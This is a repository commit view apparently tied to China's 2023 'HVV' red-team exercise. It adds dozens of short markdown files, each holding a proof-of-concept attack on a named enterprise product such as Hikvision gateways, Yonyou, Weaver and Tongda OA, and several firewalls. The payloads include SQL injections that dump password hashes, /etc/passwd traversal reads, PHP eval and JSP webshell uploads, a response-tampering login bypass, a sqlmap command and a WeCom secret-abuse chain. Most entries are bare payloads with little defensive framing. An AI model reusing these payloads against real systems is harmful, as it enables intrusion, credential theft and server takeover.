Projects STRLCPY 2023Hvv Commits e3629172
🤬
  • ■ ■ ■ ■ ■
    360 新天擎终端安全管理系统信息泄露漏洞.md
     1 +http://ip:port/runtime/admin_log_conf.cache
  • ■ ■ ■ ■ ■ ■
    Coremail 邮件系统未授权访问获取管理员账密.md
     1 +POC:
     2 + 
     3 +/coremail/common/assets/:/:/:/:/:/:/s?
     4 + 
     5 +biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa7262
     6 + 
     7 +6688chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688b
     8 + 
     9 +f6adaed61&scene=2
  • ■ ■ ■ ■ ■ ■
    HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞.md
     1 +```
     2 +<?php
     3 + $file_name = $_GET['fileName'];
     4 + $file_path = '../../../log/'.$file_name;
     5 + $fp = fopen($file_path, "r");
     6 + while($line = fgets($fp)){
     7 + $line = nl2br(htmlentities($line, ENT_COMPAT, "utf-8"));
     8 + echo '<span style="font-size:16px">'.$line.'</span>';
     9 + }
     10 + fclose($fp);
     11 +?>
     12 +```
     13 + 
     14 + 
     15 + 
     16 +```
     17 +/serverLog/showFile.php?fileName=../web/html/main.php
     18 +```
     19 + 
     20 + 
  • ■ ■ ■ ■ ■
    HiKVISION 综合安防管理平台 env 信息泄漏漏洞.md
     1 +/artemis-portal/artemis/env
  • ■ ■ ■ ■ ■ ■
    Milesight VPN server.js 任意文件读取漏洞.md
     1 +POC:
     2 + 
     3 +GET /../etc/passwd HTTP/1.1
     4 + 
     5 +Host:
     6 + 
     7 +Accept: */*
     8 + 
     9 +Content-Type: application/x-www-form-urlencoded
  • ■ ■ ■ ■ ■
    Panel loadfile 后台文件读取漏洞.md
     1 +POC: POST /api/v1/file/loadfile {"paht":"/etc/passwd"}
  • ■ ■ ■ ■ ■ ■
    PigCMS action_flashUpload 任意文件上传漏洞.md
     1 +```
     2 +POC:
     3 +POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload
     4 +HTTP/1.1
     5 +Host:
     6 +Accept-Encoding: gzip, deflate
     7 +Content-Type: multipart/form-data; boundary=----aaa
     8 +------aaa
     9 +Content-Disposition: form-data; name="filePath"; filename="test.php"
     10 +Content-Type: video/x-flv
     11 +<?php phpinfo();?>
     12 +------aaa
     13 +/cms/upload/images/2023/08/11/1691722887xXbx.php
     14 +```
     15 + 
     16 + 
  • ■ ■ ■ ■ ■ ■
    README.md
    1  -![图片](./2023hvv新出漏洞.assets/640.png)
     1 + 
     2 + 
     3 +# 8月13新增
     4 + 
     5 +绿盟 NF 下一代防火墙 任意文件上传漏洞
     6 + 
     7 +HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
     8 + 
     9 +HiKVISION 综合安防管理平台 env 信息泄漏漏洞
     10 + 
     11 +禅道 16.5 router.class.php SQL注入漏洞
     12 + 
     13 +网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
     14 + 
     15 +金和OA 未授权
     16 + 
     17 +宏景OA文件上传
     18 + 
     19 +用友畅捷通 T注入
     20 + 
     21 +用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入
     22 + 
     23 +用友时空 KSOATaskRequestServlet sql注入漏洞
     24 + 
     25 +宏景 HCM codesettree SQL 注入漏洞
     26 + 
     27 +泛微 ShowDocsImagesql注入漏洞
     28 + 
     29 +360 新天擎终端安全管理系统信息泄露漏洞
     30 + 
     31 +企业微信(私有化版本)敏感信息泄露漏洞
     32 + 
     33 +华天动力oa SQL注入
     34 + 
     35 +用友文件服务器认证绕过
     36 + 
     37 +广联达 Linkworks GetIMDictionarySQL 注入漏洞
     38 + 
     39 +网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
     40 + 
     41 +Panel loadfile 后台文件读取漏洞
     42 + 
     43 +金盘 微信管理平台 getsysteminfo 未授权访问漏洞
     44 + 
     45 +PigCMS action_flashUpload 任意文件上传漏洞
     46 + 
     47 +Coremail 邮件系统未授权访问获取管理员账密
     48 + 
     49 +Milesight VPN server.js 任意文件读取漏洞
     50 + 
     51 +红帆 oa 注入
     52 + 
     53 +nginx配置错误导致的路径穿越风险
     54 + 
     55 +用友GRP-U8存在信息泄露
     56 + 
     57 +启明星辰-4A 统一安全管控平台 getMater 信息泄漏
     58 + 
     59 +# 8月12 新增
     60 + 
     61 +安恒明御运维审计与风险控制系统堡垒机任意用户注册
     62 + 
     63 +致远oa 任意文件上传
     64 + 
     65 +致远oa rce
     66 + 
     67 +用友移动管理系统 uploadApk.d
     68 + 
     69 +用友时空KSOA PayBill SQL注入漏洞
     70 + 
     71 +网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞
     72 + 
     73 +网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞
     74 + 
     75 +通达oaCVE-2023-4166
     76 + 
     77 +通达oa_sql注入
     78 + 
     79 +天钥网关前台SQL注入
     80 + 
     81 +深信服应用交付系统命令执行漏洞
     82 + 
     83 +深信服报表
     84 + 
     85 +绿盟sas安全审计系统任意文件读取漏洞
     86 + 
     87 +绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞
     88 + 
     89 +绿盟 SAS堡垒机 Exec 远程命令执行漏洞
     90 + 
     91 +蓝凌-OA-RCE
     92 + 
     93 +金和OA C6-GetSqlData.aspx SQL注入漏洞 POC
     94 + 
     95 +汉得SRM tomcat.jsp 登录绕过漏洞
     96 + 
     97 +海康卫视前台上传
     98 + 
     99 +广联达oa 后台文件上传漏洞
     100 + 
     101 +广联达oa sql注入漏洞
     102 + 
     103 +泛微oa代码执行
     104 + 
     105 +泛微E-Office9文件上传漏洞
     106 + 
     107 +泛微 Weaver E-Office9 前台文件包含
     108 + 
     109 +泛微 E-Cology 某版本 SQL注入漏洞 POC
     110 + 
     111 +大华智慧园区综合管理平台 文件上传漏洞
     112 + 
     113 +大华智慧园区综合管理平台 searchJson SQL注入漏洞
     114 + 
     115 +大华智慧园区任意密码读取攻击
     116 + 
     117 +辰信景云终端安全管理系统 login SQL注入漏洞
     118 + 
     119 +x捷 xBR 路由器 任意文件上传漏洞
     120 + 
     121 +wps
     122 + 
     123 +Openfire身份认证绕过漏洞
     124 + 
     125 +Nacos-Sync
     126 + 
     127 +Eramba任意代码执行漏洞
  • ■ ■ ■ ■ ■
    nginx配置错误导致的路径穿越风险.md
     1 +漏洞自查PoC如下: https://github.com/hakaioffsec/navgix 该漏洞非0day,是一个路径穿越漏洞,可以直接读取nginx后台服务器文件。 有多家重点金融企业已中招,建议尽快进行自查。
  • ■ ■ ■ ■ ■ ■
    企业微信(私有化版本)敏感信息泄露漏洞.md
     1 +紧急通知,长亭报出企业微信存在信息泄露0day!目前已在准备预警,请注意!
     2 + 
     3 +企业微信URL/cgi-bin/gateway/agentinfo
     4 + 
     5 +接口未授权情况下可直接获取企业微信secret等敏感信息
     6 + 
     7 +受影响版本:2.5.x、2.6.930000、以下;
     8 + 
     9 +不受影响:2.7.x、2.8.x、2.9.x;
     10 + 
     11 +危害:
     12 + 
     13 +1、可导致企业微信全量数据被获取、文件获取,
     14 + 
     15 +2、存在使用企业微信轻应用对内发送钓鱼文件和链接等风险。
     16 + 
     17 +修复方法:
     18 + 
     19 +1、在waf上设置一个规则,匹配到/cgi-bin/gateway/agentinfo路径的进行阻断;
     20 + 
     21 +2、联系厂家进行获取修复包;
     22 + 
     23 +3、官方通报及补丁地址
     24 + 
     25 +复现及漏洞详情分析:
     26 + 
     27 +第一步:,通过泄露信息接口可以获取corpid和corpsecret
     28 + 
     29 +https://<企业微信域名>/cgi-bin/gateway/agentinfo
     30 + 
     31 +第二步,使用corpsecret和corpid获得token
     32 + 
     33 +https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
     34 + 
     35 +第三步,使用token访问诸如企业通讯录信息,修改用户密码,发送消息,云盘等接口
     36 + 
     37 +https://<企业微信域名>/cgi-bin/user/get?access_token=ACCESS_TOKEN&userid=USERID
  • ■ ■ ■ ■ ■ ■
    华天动力oa SQL注入.md
     1 +访问
     2 + 
     3 +http://xxxx//report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
     4 + 
     5 +然后抓包
     6 + 
     7 +```
     8 +POST /report/reportServlet?action=8 HTTP/1.1
     9 +Host: xxxx
     10 +Content-Length: 145
     11 +Cache-Control: max-age=0
     12 +Upgrade-Insecure-Requests: 1
     13 +Origin: http://xxx/
     14 +Content-Type: application/x-www-form-urlencoded
     15 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
     16 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     17 +Referer: http://xxxx/report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
     18 +Accept-Encoding: gzip, deflate
     19 +Accept-Language: zh-CN,zh;q=0.9
     20 +Cookie: JSESSIONID=D207AE96056400942620F09D34B8CDF3
     21 +Connection: close
     22 + 
     23 +year=*&userName=*&startDate=*&endDate=*&dutyRule=*&resultPage=%2FreportJsp%2FshowRepo
     24 +```
     25 + 
     26 + 
  • ■ ■ ■ ■ ■ ■
    启明星辰-4A 统一安全管控平台 getMater 信息泄漏.md
     1 +漏洞描述:
     2 + 
     3 +启明星辰集团4A统一安全管控平台实现IT资源集中管理,为企业提供集中的账号、认证、授权、审计管理技术支撑及配套流程,提升系统安全性和可管理能力。可获取相关人员敏感信息。
     4 + 
     5 +```
     6 +poc:
     7 + relative: req0
     8 + session: false
     9 + requests:
     10 + - method: GET
     11 + timeout: 10
     12 + path: /accountApi/getMaster.do
     13 + headers:
     14 + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
     15 + like Gecko) Chrome/65.0.881.36 Safari/537.36
     16 + follow_redirects: true
     17 + matches: (code.eq("200") && body.contains("\"state\":true"))
     18 +```
     19 + 
     20 + 
     21 + 
     22 +修复建议:
     23 + 
     24 +限制文件访问
  • ■ ■ ■ ■ ■ ■
    宏景 HCM codesettree SQL 注入漏洞.md
     1 +```
     2 +GET
     3 +/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20al
     4 +l~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d HTTP/1.1
     5 +Host: 127.0.0.1
     6 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
     7 +like Gecko) 5bGx5rW35LmL5YWz
     8 +Accept-Encoding: gzip, deflate
     9 +Connection: close
     10 +```
     11 + 
     12 + 
  • ■ ■ ■ ■ ■ ■
    宏景OA文件上传.md
     1 +```
     2 +POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
     3 +Host: xx.xx.xx.xx
     4 +Cookie: JSESSIONID=C92F3ED039AAF958516349D0ADEE426E
     5 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
     6 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     7 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
     8 +Accept-Encoding: gzip, deflate
     9 +Connection: close
     10 +Content-Length: 417
     11 + 
     12 +DBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQ
     13 +OPTION=U0FWRUZJTEU=
     14 +currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
     15 +FILETYPE=Li5cMW5kZXguanNw
     16 +RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
     17 +originalFileId=wV66
     18 +originalCreateDate=wUghPB3szB3Xwg66
     19 +FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
     20 +needReadFile=yRWZdAS6
     21 +originalCreateDate=wLSGP4oEzLKAz4=iz=66
     22 + 
     23 +1
     24 +```
     25 + 
     26 +shell:http://xx.xx.xx.xx/1ndex.jsp
  • ■ ■ ■ ■ ■ ■
    广联达 Linkworks GetIMDictionarySQL 注入漏洞.md
     1 +POC:
     2 + 
     3 +```
     4 +POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
     5 +Host:
     6 +Content-Type: application/x-www-form-urlencoded
     7 + 
     8 +key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
     9 +```
     10 + 
     11 + 
  • ■ ■ ■ ■ ■ ■
    泛微 ShowDocsImagesql注入漏洞.md
     1 +```
     2 +GET
     3 +/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
     4 +Host: 127.0.0.1
     5 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
     6 +like Gecko) 5bGx5rW35LmL5YWz
     7 +Accept-Encoding: gzip, deflate
     8 +Connection: close
     9 +```
     10 + 
     11 + 
  • ■ ■ ■ ■ ■
    用友GRP-U8存在信息泄露.md
     1 +漏洞描述:用友U8系统存可直接访问log日志,泄露敏感信息
     2 + 
     3 +批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E7%94%A8%E5%8F%8BGRP-U8
     4 + 
     5 +GET /logs/info.log HTTP/1.1
  • ■ ■ ■ ■ ■ ■
    用友文件服务器认证绕过.md
     1 +资产搜索:
     2 + 
     3 +app="用友-NC-Cloud" 或者是app="用友-NC-Cloud" && server=="Apache-Coyote/1.1"
     4 + 
     5 +POST数据包修改返回包 false改成ture就可以绕过登陆
     6 + 
     7 +```
     8 +HTTP/1.1 200 OK
     9 +Server: Apache-Coyote/1.1
     10 +Date: Thu, 10 Aug 2023 20:38:25 GMT
     11 +Connection: close
     12 +Content-Length: 17
     13 + 
     14 +{"login":"false"}
     15 +```
     16 + 
     17 + 
  • ■ ■ ■ ■ ■ ■
    用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入.md
     1 +```
     2 +GET
     3 +/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))-
     4 +-+ HTTP/1.1
     5 +Host: 127.0.0.1
     6 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
     7 +like Gecko) 5bGx5rW35LmL5YWz
     8 +Accept-Encoding: gzip, deflate
     9 +Connection:
     10 +```
     11 + 
     12 + 
  • ■ ■ ■ ■ ■
    用友时空 KSOATaskRequestServlet sql注入漏洞.md
     1 +```
     2 +/servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1*&password=1,
     3 +```
     4 + 
     5 + 
  • ■ ■ ■ ■ ■
    用友畅捷通 T注入.md
     1 +sqlmap -u http://xx.xx.xx.xx/WebSer~1/create_site.php?site_id=1 --is-dba
  • ■ ■ ■ ■ ■ ■
    禅道 16.5 router.class.php SQL注入漏洞.md
     1 +```
     2 +POST /user-login.html
     3 +
     4 + account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23
     5 +```
     6 + 
     7 + 
  • ■ ■ ■ ■ ■ ■
    红帆 oa 注入.md
     1 +POC
     2 + 
     3 +```
     4 +POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
     5 +Host: 10.250.250.5
     6 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
     7 +like Gecko) Version/12.0.3 Safari/605.1.15
     8 +Content-Length: 383
     9 +Content-Type: text/xml; charset=utf-8
     10 +Soapaction: "http://tempuri.org/GetFileAtt"
     11 +Accept-Encoding: gzip, deflate
     12 +Connection: close
     13 +<?xml version="1.0" encoding="utf-8"?><soap:Envelope
     14 +xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
     15 +xmlns:xsd="http://www.w3.org/2001/XMLSchema"
     16 +xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
     17 +xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so
     18 +ap:Envelope>
     19 +```
     20 + 
     21 + 
  • ■ ■ ■ ■ ■ ■
    绿盟 NF 下一代防火墙 任意文件上传漏洞.md
     1 +POC:
     2 + 
     3 +```
     4 +POST /api/v1/device/bugsInfo HTTP/1.1
     5 +Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
     6 +Host:
     7 +--4803b59d015026999b45993b1245f0ef
     8 +Content-Disposition: form-data; name="file"; filename="compose.php"
     9 + 
     10 +<?php eval($_POST['cmd']);?>
     11 +--4803b59d015026999b45993b1245f0ef--
     12 + 
     13 + 
     14 + 
     15 + 
     16 +POST /mail/include/header_main.php HTTP/1.1
     17 +Content-Type: application/x-www-form-urlencoded
     18 +Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
     19 +Host:
     20 + 
     21 +cmd=phpinfo();
     22 +```
     23 + 
     24 + 
  • ■ ■ ■ ■ ■
    网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞.md
     1 +POC: /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
  • 网神 SecGate 3600 防火墙.assets/image-20230810090932372.png 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.assets/image-20230810090932372.png
  • 网神 SecGate 3600 防火墙.assets/image-20230810090941737.png 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.assets/image-20230810090941737.png
  • 网神 SecGate 3600 防火墙.assets/image-20230810090957770.png 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.assets/image-20230810090957770.png
  • 网神 SecGate 3600 防火墙.assets/image-20230810091011621.png 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.assets/image-20230810091011621.png
  • ■ ■ ■ ■ ■ ■
    网神 SecGate 3600 防火墙.md 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞.md
    skipped 13 lines
    14 14   
    15 15  登录页面
    16 16   
    17  -![image-20230810090932372](./网神 SecGate 3600 防火墙.assets/image-20230810090932372.png)
     17 +![image-20230810090932372](./网神 SecGate 3600 防火墙 obj_app_upfile .assets/image-20230810090932372.png)
    18 18   
    19 19  出现漏洞的文件 webui/modules/object/app.mds
    20 20   
    21  -![image-20230810090941737](./网神 SecGate 3600 防火墙.assets/image-20230810090941737.png)
     21 +![image-20230810090941737](./网神 SecGate 3600 防火墙 obj_app_upfile .assets/image-20230810090941737.png)
    22 22   
    23 23  代码中没有对文件调用进行鉴权,且文件上传路径为可访问路径,造成任意文件上传
    24 24   
    25  -![image-20230810090957770](./网神 SecGate 3600 防火墙.assets/image-20230810090957770.png)
     25 +![image-20230810090957770](./网神 SecGate 3600 防火墙 obj_app_upfile .assets/image-20230810090957770.png)
    26 26   
    27 27  ```
    28 28  POST /?g=obj_app_upfile HTTP/1.1
    skipped 27 lines
    56 56   
    57 57  默认上传路径 /secgate/webui/attachements/ , 访问 attachements/xxx.php 文件
    58 58   
    59  -![image-20230810091011621](./网神 SecGate 3600 防火墙.assets/image-20230810091011621.png)
     59 +![image-20230810091011621](./网神 SecGate 3600 防火墙 obj_app_upfile .assets/image-20230810091011621.png)
  • ■ ■ ■ ■ ■ ■
    金和OA 未授权.md
     1 +1. ​ 漏洞链接
     2 + 
     3 +http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1
     4 + 
     5 +1. ​ 复现步骤
     6 + 
     7 +http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1%3bWAITFOR+DELAY+'0%3a0%3a5'+--%20and%201=1
  • ■ ■ ■ ■ ■
    金盘 微信管理平台 getsysteminfo 未授权访问漏洞.md
     1 +POC: /admin/weichatcfg/getsysteminfo
  • x捷 xBR 路由器 任意文件上传漏洞.md 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞.md
    Content is identical
  • ■ ■ ■ ■ ■ ■
    锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露.md
     1 +漏洞描述:锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露漏洞
     2 + 
     3 +批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BAWEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FEXCU_SHELL
     4 + 
     5 +```
     6 +GET /EXCU_SHELL HTTP/1.1
     7 + 
     8 +Host:
     9 + 
     10 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36
     11 + 
     12 +Accept-Encoding: gzip, deflate
     13 + 
     14 +Accept: */*
     15 + 
     16 +Connection: close
     17 + 
     18 +Cmdnum: '1'
     19 + 
     20 +Command1: show running-config
     21 + 
     22 +Confirm1: n
     23 +```
     24 + 
     25 + 
Please wait...
Page is in error, reload to recover